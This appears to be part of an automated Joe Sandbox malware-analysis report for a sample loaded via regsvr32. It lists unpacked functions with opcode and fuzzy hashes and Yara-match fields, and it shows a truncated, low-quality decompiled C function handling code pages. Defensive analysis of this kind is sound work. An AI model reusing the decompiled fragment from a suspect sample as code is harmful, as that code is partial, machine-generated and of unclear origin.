                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: hk$i]zn
                                                                                                    • API String ID: 0-3702273699
                                                                                                    • Opcode ID: b7e9d60bbee86b892e8e1abf7b561a31af77b18d720a78c8093eb3ed57e30fbb
                                                                                                    • Instruction ID: 26803260217e86f3a3d8da6d7447e78da29ccf89b556f46d4152a983f5847e43
                                                                                                    • Opcode Fuzzy Hash: b7e9d60bbee86b892e8e1abf7b561a31af77b18d720a78c8093eb3ed57e30fbb
                                                                                                    • Instruction Fuzzy Hash: B56192B190078E8FDF48CF64C84A5DE7BB0BB58318F104A1DED6696260D3B4D665CF84
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02602564 Relevance: 2.6, Strings: 2, Instructions: 127COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (P4$gN
                                                                                                    • API String ID: 0-3591496193
                                                                                                    • Opcode ID: fe3cd2967169a0291c1f64274a3c8d1d9a378be29efe577ef24db4fbdce21655
                                                                                                    • Instruction ID: 3a1c05088173292e2ae2188e42adadcd6f11f8081d22dfbce9e68f5bf00089b0
                                                                                                    • Opcode Fuzzy Hash: fe3cd2967169a0291c1f64274a3c8d1d9a378be29efe577ef24db4fbdce21655
                                                                                                    • Instruction Fuzzy Hash: D461927550878CCBEBBACF28CC996DB3BB1FB58308F500619D84E8E290DB7A5645CB41
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02626C84 Relevance: 2.6, Strings: 2, Instructions: 122COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: C$|#
                                                                                                    • API String ID: 0-2847567307
                                                                                                    • Opcode ID: 0d84abd90e51e5334e2de4a22d68c6c6bc4e8539a5884e602002fd65f87289f7
                                                                                                    • Instruction ID: 4ea9c8bd00af01001b80737e79d8f8d36517f9fd718bb82b2a7422af0d89139f
                                                                                                    • Opcode Fuzzy Hash: 0d84abd90e51e5334e2de4a22d68c6c6bc4e8539a5884e602002fd65f87289f7
                                                                                                    • Instruction Fuzzy Hash: 6C510C7061D7949BD3A8DF28C5C551FBBE5FB85304F906E2DF986C62A4C738D8098B42
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 026178A8 Relevance: 2.6, Strings: 2, Instructions: 105COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: =B$bKj
                                                                                                    • API String ID: 0-3207634125
                                                                                                    • Opcode ID: d5cbce0d4e3c5c9a5bc045f672eaaf1e9ee95dac4116153198b43daf9893758e
                                                                                                    • Instruction ID: 540b02c7535e83a315cee733bb28626ef0286a169c81c7612f04edaf97388b94
                                                                                                    • Opcode Fuzzy Hash: d5cbce0d4e3c5c9a5bc045f672eaaf1e9ee95dac4116153198b43daf9893758e
                                                                                                    • Instruction Fuzzy Hash: 9B4128B0519B499BE78DCF29C49952ABBE2FBC4304F445A2DF4868B3A0D774E805CB42
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 026049D8 Relevance: 2.6, Strings: 2, Instructions: 95COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: =f$at
                                                                                                    • API String ID: 0-2501124618
                                                                                                    • Opcode ID: 27a29b8d2f94033d9ec7f15f88e366438b0bb7326dab1604ab0a63ab06dfa262
                                                                                                    • Instruction ID: 7aff1dc57606e436df9bce574c2ce75bfe22b8b8602e8df280ac978a3c9e653a
                                                                                                    • Opcode Fuzzy Hash: 27a29b8d2f94033d9ec7f15f88e366438b0bb7326dab1604ab0a63ab06dfa262
                                                                                                    • Instruction Fuzzy Hash: 2E41A1B090038E8FCB48DF68D88A5DE7BB0FB58348F004A19E86996260D7B4D664CF95
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02601194 Relevance: 2.6, Strings: 2, Instructions: 88COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 5$=-
                                                                                                    • API String ID: 0-3496290941
                                                                                                    • Opcode ID: a257bcc0df0397f0448a528b2e51555bd80013745dac04bbf7cc00815a8312d0
                                                                                                    • Instruction ID: f15222eaedac1a6533a29fae4668822cd7544bbb4374b5f42072e4e50cf3623d
                                                                                                    • Opcode Fuzzy Hash: a257bcc0df0397f0448a528b2e51555bd80013745dac04bbf7cc00815a8312d0
                                                                                                    • Instruction Fuzzy Hash: 0F41ADB0C1062C9BDF48DFE8D98A5CDBBF0FB08308F505659D415B62A0D3B95A08CF69
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0262234C Relevance: 2.6, Strings: 2, Instructions: 83COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: !Mps$.
                                                                                                    • API String ID: 0-1495746187
                                                                                                    • Opcode ID: 53415260284c827c03b0867a9406cc641a790dc7e10219fd3ab688a2b1ec1654
                                                                                                    • Instruction ID: 68b354aff309ccea5dee10894dd80e88d7348084de46b7f19d303ef0ca2b92be
                                                                                                    • Opcode Fuzzy Hash: 53415260284c827c03b0867a9406cc641a790dc7e10219fd3ab688a2b1ec1654
                                                                                                    • Instruction Fuzzy Hash: 9241AEB090074A8BDB48CF68D48A5DE7FF0FB68398F204619E855A6250D3B896A4CBC5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02609320 Relevance: 2.6, Strings: 2, Instructions: 83COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 55y$VI
                                                                                                    • API String ID: 0-190782874
                                                                                                    • Opcode ID: 983a4d8ce8a4fbb73d9b0303e78255aecd59c86713b274cbdb3eb4de4a26bb4f
                                                                                                    • Instruction ID: d5b254f2ae1f29977e14640008d674f29add6579ef471035d6cca4bcd35f8dbd
                                                                                                    • Opcode Fuzzy Hash: 983a4d8ce8a4fbb73d9b0303e78255aecd59c86713b274cbdb3eb4de4a26bb4f
                                                                                                    • Instruction Fuzzy Hash: D941C7B090078A8FDF88CF64C8895DE7BB0FB58358F114A19EC6696290D3B8D665CFC5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0260CB2C Relevance: 2.6, Strings: 2, Instructions: 83COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: *,+K$sUP
                                                                                                    • API String ID: 0-345814855
                                                                                                    • Opcode ID: 3194b177039017bea246856a04f54c49f50b9e51a92a21d730f65e6a614d8863
                                                                                                    • Instruction ID: 5f776d740f8332812f653ee98083c2d73df6b7bfff7c9ab520fae3eebb9dcc71
                                                                                                    • Opcode Fuzzy Hash: 3194b177039017bea246856a04f54c49f50b9e51a92a21d730f65e6a614d8863
                                                                                                    • Instruction Fuzzy Hash: 864107B090438E8FDF48CF28D8895DE3BB0FB48358F114A1DF85AA6290D7B49664CF85
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02605CF4 Relevance: 2.6, Strings: 2, Instructions: 79COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: $M$$
                                                                                                    • API String ID: 0-208637664
                                                                                                    • Opcode ID: 457c74069e77f0b577e5b14a100c4284eba920960005d7d05d8b4fbdc509f295
                                                                                                    • Instruction ID: 961b18829ab3c3312d4e9535a7cdcb822cc9f6d6ecea3771cf86c623a08c4ceb
                                                                                                    • Opcode Fuzzy Hash: 457c74069e77f0b577e5b14a100c4284eba920960005d7d05d8b4fbdc509f295
                                                                                                    • Instruction Fuzzy Hash: A54193B190034A8FDB48CF64C88A5DE7FB1FB58398F114619FC59A6250D3B8DAA4CBC5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02606618 Relevance: 2.6, Strings: 2, Instructions: 78COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: U)$Zq7
                                                                                                    • API String ID: 0-43569613
                                                                                                    • Opcode ID: 86fd4d7839da7ee34ef3eac66998821febe08b9e60b76d466e3cf15e7e531b32
                                                                                                    • Instruction ID: bccf36c2d38a5df654baeae54c0edd9280aaffdd1234012f57012c2e2649a87d
                                                                                                    • Opcode Fuzzy Hash: 86fd4d7839da7ee34ef3eac66998821febe08b9e60b76d466e3cf15e7e531b32
                                                                                                    • Instruction Fuzzy Hash: C041A3B190078E8FDB48DF64C88A5DE7BF1FB58308F014A19E869A6250D3B89664CF95
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 026117C4 Relevance: 2.6, Strings: 2, Instructions: 74COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: ,$_2
                                                                                                    • API String ID: 0-3311194724
                                                                                                    • Opcode ID: 60cb743d879ce10b1e4578e9f23933b1919d0e8873dc27da475b1191d1249a39
                                                                                                    • Instruction ID: 7b715e1c7ca842bb7c9e71ada611cfbc9ab885f92ca73f6428ea4c890926a530
                                                                                                    • Opcode Fuzzy Hash: 60cb743d879ce10b1e4578e9f23933b1919d0e8873dc27da475b1191d1249a39
                                                                                                    • Instruction Fuzzy Hash: 4D31B3B190038E8FDB48CF64D94A5CE7BB0FB18358F110A1DFD6AA6250D3B89665CF85
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0260CC90 Relevance: 2.6, Strings: 2, Instructions: 74COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (h}$Jb
                                                                                                    • API String ID: 0-1405104432
                                                                                                    • Opcode ID: 53c08fa34781b1bca7077160d0a2cdf5944c1dce1579e6b7bc8548b54fe8b4fe
                                                                                                    • Instruction ID: eea84491289c48df622d39518b4e54b9481ed3bd0f09d3daf54a01bc7a1835d3
                                                                                                    • Opcode Fuzzy Hash: 53c08fa34781b1bca7077160d0a2cdf5944c1dce1579e6b7bc8548b54fe8b4fe
                                                                                                    • Instruction Fuzzy Hash: 3C31F4705187889BE788DF29C48980BBBE2FB98358F504A1DF4C5973A0D774D845CF46
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0260134C Relevance: 2.6, Strings: 2, Instructions: 73COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 7$+
                                                                                                    • API String ID: 0-1816969625
                                                                                                    • Opcode ID: aabedda737e1c35f654a909c602d622174239346966b3c55e8edacada683e696
                                                                                                    • Instruction ID: 4312800f39d35f74389c324c516be21e6e6aaf3f50fa794f894d3300fc1cf7f0
                                                                                                    • Opcode Fuzzy Hash: aabedda737e1c35f654a909c602d622174239346966b3c55e8edacada683e696
                                                                                                    • Instruction Fuzzy Hash: F53193B4528781ABC398DF28C48A91BBBE1FB89304F806A1DF8C686390D375D506CB43
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0261F370 Relevance: 2.6, Strings: 2, Instructions: 71COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: $${c/
                                                                                                    • API String ID: 0-2133081984
                                                                                                    • Opcode ID: 8c2d45e3ba7a2f51bbdb13eb37dd46c15817bc2f471355951261d77a534da730
                                                                                                    • Instruction ID: 4e422a4a01a876e89422d9d1389a3e9eebc8e691fd294e0f917ba9eab6fca553
                                                                                                    • Opcode Fuzzy Hash: 8c2d45e3ba7a2f51bbdb13eb37dd46c15817bc2f471355951261d77a534da730
                                                                                                    • Instruction Fuzzy Hash: 79319174629780AFD388DF28C49A81EBBF1FB89308F806A1DF9C686390D775D545CB42
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02617674 Relevance: 2.6, Strings: 2, Instructions: 68COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: {L$|=D<
                                                                                                    • API String ID: 0-2314766109
                                                                                                    • Opcode ID: 10725ca7faf088994dd1c9bae764ad55ab79b3e086f5c79b72453405c0fdc599
                                                                                                    • Instruction ID: 652daa7565e1ae0eccd7fa6f847e9912d020ee764b4890b92ec80e6e835c886a
                                                                                                    • Opcode Fuzzy Hash: 10725ca7faf088994dd1c9bae764ad55ab79b3e086f5c79b72453405c0fdc599
                                                                                                    • Instruction Fuzzy Hash: 9C3180B45187818BD348DF28C09A51ABBE0FB8D74CF404B1DF8CAA6291D778D606CB4A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0261CA28 Relevance: 2.6, Strings: 2, Instructions: 68COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 2N$8zI
                                                                                                    • API String ID: 0-2752875910
                                                                                                    • Opcode ID: 40a02900fbd3cf14da6c7808899370d4d42a40c1f2ad73a5bd5c9e1b9518d5a8
                                                                                                    • Instruction ID: 0bc9ebd57a805638d0918f23dfd06c77e08e8552ec6e30084e9e1ca6bcc6a8cb
                                                                                                    • Opcode Fuzzy Hash: 40a02900fbd3cf14da6c7808899370d4d42a40c1f2ad73a5bd5c9e1b9518d5a8
                                                                                                    • Instruction Fuzzy Hash: 44317EB0529781AFC388DF28C49991ABBF1FBC8304F81AA1DF8C69B250D775D945CB46
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02609E24 Relevance: 2.6, Strings: 2, Instructions: 64COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: QJ[$=
                                                                                                    • API String ID: 0-1973694401
                                                                                                    • Opcode ID: 82a44f021eb09e88880961c323c756712d4f895afc4b2f6823e8171388236ef7
                                                                                                    • Instruction ID: 7f3c8752471347880680f085fe6f14ca1a49aff2ed41fa9c9824f203eae3a3ce
                                                                                                    • Opcode Fuzzy Hash: 82a44f021eb09e88880961c323c756712d4f895afc4b2f6823e8171388236ef7
                                                                                                    • Instruction Fuzzy Hash: 66317DB5529380AFD388DF28D49981ABBE1FB88348F846A1DF8868B250D779D445CB43
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02604C6C Relevance: 2.6, Strings: 2, Instructions: 64COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: >>q${I
                                                                                                    • API String ID: 0-3165684446
                                                                                                    • Opcode ID: 5f5429cdf08a85fbf63746acdb718f67be6cacd37e4919b28738dcdce2387504
                                                                                                    • Instruction ID: 772b765a8258f3051adf3ba83b4ce11e1452173b8d188337218cb68a09c82acd
                                                                                                    • Opcode Fuzzy Hash: 5f5429cdf08a85fbf63746acdb718f67be6cacd37e4919b28738dcdce2387504
                                                                                                    • Instruction Fuzzy Hash: 733172B180078ECFDB54CF64C88A4DE7BB0FB54358F110A19F86996254D7B8D6A4CF85
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 026136D4 Relevance: 2.6, Strings: 2, Instructions: 63COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: U~9i$0
                                                                                                    • API String ID: 0-1996205304
                                                                                                    • Opcode ID: 8f6c8e162dca8af22df56008dd6fe25e5d0a68da7a4e21c7b3615f002201a1d1
                                                                                                    • Instruction ID: 6b54f4a14e6967f537a97a6a5d89d0166c6b3e1efad7e26f3eb8efa8fcaf054d
                                                                                                    • Opcode Fuzzy Hash: 8f6c8e162dca8af22df56008dd6fe25e5d0a68da7a4e21c7b3615f002201a1d1
                                                                                                    • Instruction Fuzzy Hash: 253178B45187848FD389DF28D45951ABBE0BB9C348F408B2DF4CAAA294D7789604CF0A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0260A5A0 Relevance: 2.6, Strings: 2, Instructions: 63COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: HKf$J4
                                                                                                    • API String ID: 0-2591597018
                                                                                                    • Opcode ID: 46fcd9d5ddb2e0325674123a9d440a86eae04111372ab5b0216b8786bb1694ed
                                                                                                    • Instruction ID: 1c374fd82c63ea00815679f22d47b037f32bd6aee3e5aa62b4145a5ff72a2e15
                                                                                                    • Opcode Fuzzy Hash: 46fcd9d5ddb2e0325674123a9d440a86eae04111372ab5b0216b8786bb1694ed
                                                                                                    • Instruction Fuzzy Hash: 77315DB55087858BD348DF28C45951ABBE0FB8C318F404B2DF4CAAB260D778D645CB4A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02609634 Relevance: 2.6, Strings: 2, Instructions: 50COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: R$sf
                                                                                                    • API String ID: 0-742164305
                                                                                                    • Opcode ID: 9eaf5040bc1310ddcffc242b1cf541788e9322003bf7a5b9ef54aa535dd38ffb
                                                                                                    • Instruction ID: 8a7f3447893e2a28e22eeb5fa68e17aee9828483103f709cca0528eecb18a0cb
                                                                                                    • Opcode Fuzzy Hash: 9eaf5040bc1310ddcffc242b1cf541788e9322003bf7a5b9ef54aa535dd38ffb
                                                                                                    • Instruction Fuzzy Hash: 96213DB0A087849BD388DF68D54551BBBE0BB8C358F414B1DF4CAA6360E778D644CF4A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 000000018003A564 Relevance: 1.8, APIs: 1, Instructions: 339COMMONCrypto
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 36%
                                                                                                    			E0000000118003A564(signed long long __rbx, long long __rcx, void* __rdx, long long __rsi) {
				void* __rdi;
				signed int _t140;
				void* _t156;
				signed int _t173;
				signed int _t176;
				void* _t178;
				signed long long _t210;
				signed long long _t211;
				long long _t213;
				signed long long _t214;
				long long _t216;
				long long _t225;
				signed char* _t234;
				long long _t236;
				signed char* _t237;
				void* _t240;
				signed long long _t253;
				void* _t256;
				long long _t268;
				signed long long _t269;
				void* _t271;
				signed long long _t272;
				void* _t278;
				intOrPtr* _t281;
				signed long long _t284;
				signed long long _t287;
				int _t289;
				signed long long _t290;
				void* _t291;

				_t266 = __rsi;
				_t256 = __rdx;
				_t225 = __rbx;
				_t278 = _t271;
				 *((long long*)(_t278 + 0x10)) = __rbx;
				 *((long long*)(_t278 + 0x18)) = _t268;
				 *((long long*)(_t278 + 0x20)) = __rsi;
				_t272 = _t271 - 0xa0;
				_t210 =  *0x8005d010; // 0xb03f6156e10
				_t211 = _t210 ^ _t272;
				 *(_t272 + 0x98) = _t211;
				 *((long long*)(_t278 - 0x58)) = __rcx;
				 *((long long*)(_t278 - 0x50)) = __rbx;
				r15d = 0;
				r14d = 0;
				r13d = 0;
				if ( *((intOrPtr*)(__rcx + 0x138)) == 0) goto 0x8003aaba;
				_t281 = __rcx + 0xc;
				 *(_t272 + 0x58) = __rbx;
				_t10 = _t225 + 1; // 0x1
				_t178 = _t10;
				if ( *_t281 != 0) goto 0x8003a5ed;
				 *((long long*)(_t272 + 0x20)) = _t281;
				r9d = 0x1004;
				if (E00000001180042C2C(_t156, 0, _t278 - 0x58,  *((intOrPtr*)(__rcx + 0x138))) != 0) goto 0x8003aa8a;
				_t229 = __rsi;
				E0000000118002E7AC(_t107, __rsi, _t256);
				 *(_t272 + 0x58) = _t211;
				E0000000118002E7AC(E0000000118002E8A0(_t211, __rsi), __rsi, _t256);
				_t290 = _t211;
				E0000000118002E7AC(E0000000118002E8A0(_t211, __rsi), _t229, __rsi);
				_t287 = _t211;
				E0000000118002E7AC(E0000000118002E8A0(_t211, _t229), _t229, __rsi);
				_t269 = _t211;
				E0000000118002E7AC(E0000000118002E8A0(_t211, _t229), _t229, __rsi);
				_t284 = _t211;
				E0000000118002E8A0(_t211, _t229);
				if ( *(_t272 + 0x58) == __rbx) goto 0x8003aa8a;
				if (_t290 == 0) goto 0x8003aa8a;
				if (_t284 == 0) goto 0x8003aa8a;
				if (_t287 == 0) goto 0x8003aa8a;
				if (_t269 == 0) goto 0x8003aa8a;
				 *_t284 = 0;
				if (0 + _t178 - 0x100 < 0) goto 0x8003a694;
				if (GetCPInfo(_t289) == 0) goto 0x8003aa8a;
				if ( *(_t272 + 0x80) - 5 > 0) goto 0x8003aa8a;
				_t18 = _t287 + 0x81; // 0x81
				_t20 = _t284 + 1; // 0x1
				 *((intOrPtr*)(_t272 + 0x40)) = 0;
				 *(_t272 + 0x50) =  *(_t272 + 0x80) & 0x0000ffff;
				 *((intOrPtr*)(_t272 + 0x38)) =  *_t281;
				 *((intOrPtr*)(_t272 + 0x30)) = 0xff;
				 *((long long*)(_t272 + 0x28)) = _t18;
				 *((intOrPtr*)(_t272 + 0x20)) = 0xff;
				_t27 = _t211 + 1; // 0x100
				r8d = _t27;
				if (E00000001180039398(0, 0, 2,  *(_t272 + 0x80) - 5, _t211, __rbx, _t18,  *((intOrPtr*)(__rcx + 0x138)), __rsi, _t20) == 0) goto 0x8003aa8a;
				_t28 = _t269 + 0x81; // 0x81
				_t30 = _t284 + 1; // 0x1
				 *((intOrPtr*)(_t272 + 0x40)) = 0;
				r8d = 0x200;
				 *((intOrPtr*)(_t272 + 0x38)) =  *_t281;
				 *((intOrPtr*)(_t272 + 0x30)) = 0xff;
				 *((long long*)(_t272 + 0x28)) = _t28;
				 *((intOrPtr*)(_t272 + 0x20)) = 0xff;
				if (E00000001180039398(0, 0, 2, E00000001180039398(0, 0, 2,  *(_t272 + 0x80) - 5, _t211, __rbx, _t18,  *((intOrPtr*)(__rcx + 0x138)), __rsi, _t20), _t211, _t225, _t28,  *((intOrPtr*)(__rcx + 0x138)), _t266, _t30) == 0) goto 0x8003aa8a;
				if ( *(_t272 + 0x50) - _t178 <= 0) goto 0x8003a799;
				if ( *((intOrPtr*)(_t272 + 0x86)) == 0) goto 0x8003a799;
				_t234 = _t272 + 0x87;
				if ( *_t234 == 0) goto 0x8003a799;
